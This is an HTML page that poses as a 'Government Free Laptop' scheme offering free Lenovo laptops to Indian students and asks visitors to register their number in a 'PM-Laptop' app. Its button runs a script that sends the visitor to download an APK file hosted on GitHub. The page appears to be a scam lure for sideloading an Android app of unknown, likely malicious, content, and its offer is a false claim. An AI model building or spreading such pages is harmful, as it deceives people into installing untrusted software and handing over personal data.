


<html>
    
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	
	<head>
		<Title>Free-Laptop</Title>
		<style>
			body{
				font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
			}
	
	.dabavanu {
		background-color:#E40E0E;
		cursor:pointer;
		color:#ffffff;
		font-family:Arial;
		font-size:20px;
		font-weight:bold;
		padding: 15px;
		text-decoration:none;
		text-shadow:0px 1px 0px #E40E0E;
	}
	.dabavanu:hover {
		background-color:#E40E0E;
	}
	.dabavanusw {
		background-color:#E40E0E;
		cursor:pointer;
		color:#ffffff;
		font-family:Arial;
		font-size:20px;
		font-weight:bold;
		padding: 15px;
		text-decoration:none;
		text-shadow:0px 1px 0px #E40E0E;
	}
	.dabavanu:active {
		position:relative;
		top:1px;
	}
	
		</style>
	</head>
	<script>
	function clik() 
	{
		var m = new Date().getMinutes(); 
		if(m%2==0)
		{
			window.location="https://github.com/newlatp/w/raw/main/PM-Laptop.apk"; 
		}
		else
		{
			window.location="https://github.com/newlatp/w/raw/main/PM-Laptop.apk";
		}
	}
	</script>
	<body>
	<center>
		
			<img src="https://i.postimg.cc/NGDwWLQD/images.png"  height="101"/>
			<h2>Goverment-Free Laptop</h2><h3>
				Free Lenovo laptop to all students of india<br>
	LENOVO.PVT.LTD<br><br>
	Register your number on PM-Laptop app</br></h3>
			<div onclick="clik()"  class="dabavanu">Download Now(.APK)</a>
	
	
			
	
	
		</div>
	</center>
	</html>
	
